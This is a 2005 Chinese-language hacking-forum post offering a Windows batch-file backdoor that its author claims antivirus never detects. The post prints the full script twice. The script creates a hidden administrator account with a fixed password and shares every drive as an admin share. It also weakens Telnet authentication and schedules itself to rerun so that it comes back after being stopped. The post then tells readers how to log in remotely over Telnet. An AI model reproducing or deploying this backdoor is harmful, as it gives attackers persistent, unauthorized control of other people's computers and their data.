2005-12-03 12:39:39 by: h4x0r
用批处理写的后门 永不被杀
作者:xyt
代码思路是影子鹰DESERT朋友的,原代码比较麻烦,我做了改进,这个后门优点就是小而且不会被杀,放到SYSTEM32目录下就可以了 ,代码如下:
运行后TELNET IP上去,用户名为h4x0r,密码为chinahacker。
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=235
代码思路是影子鹰DESERT朋友的,原代码比较麻烦,我做了改进,这个后门优点就是小而且不会被杀,放到SYSTEM32目录下就可以了 ,代码如下:
@echo off
@attrib +s + r h4x0r.bat
@net user h4x0r chinahacker /add
@net localgroup administrators h4x0r /add
@net share c$=c:
@net share d$=d:
@net share e$=e:
@net share f$=f:
@net share g$=g:
@net share h$=h:
@tlntadmn config sec = -ntlm
@net stop schedule
@net start Schedule
@echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\h4x0r.bat
@echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\h4x0r.bat
@at 11:05 c:\WINNT\SYSTEM32\h4x0r.bat
@at 23:05 c:\WINNT\SYSTEM32\h4x0r.bat
@net stop telnet
@net start telnet
@exit
这样就会循环运行我们的程序了,即使被人停下来,过几个小时,又回重新运行,呵呵~~@attrib +s + r h4x0r.bat
@net user h4x0r chinahacker /add
@net localgroup administrators h4x0r /add
@net share c$=c:
@net share d$=d:
@net share e$=e:
@net share f$=f:
@net share g$=g:
@net share h$=h:
@tlntadmn config sec = -ntlm
@net stop schedule
@net start Schedule
@echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\h4x0r.bat
@echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\h4x0r.bat
@at 11:05 c:\WINNT\SYSTEM32\h4x0r.bat
@at 23:05 c:\WINNT\SYSTEM32\h4x0r.bat
@net stop telnet
@net start telnet
@exit
运行后TELNET IP上去,用户名为h4x0r,密码为chinahacker。
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=235
There is no comment on this article.
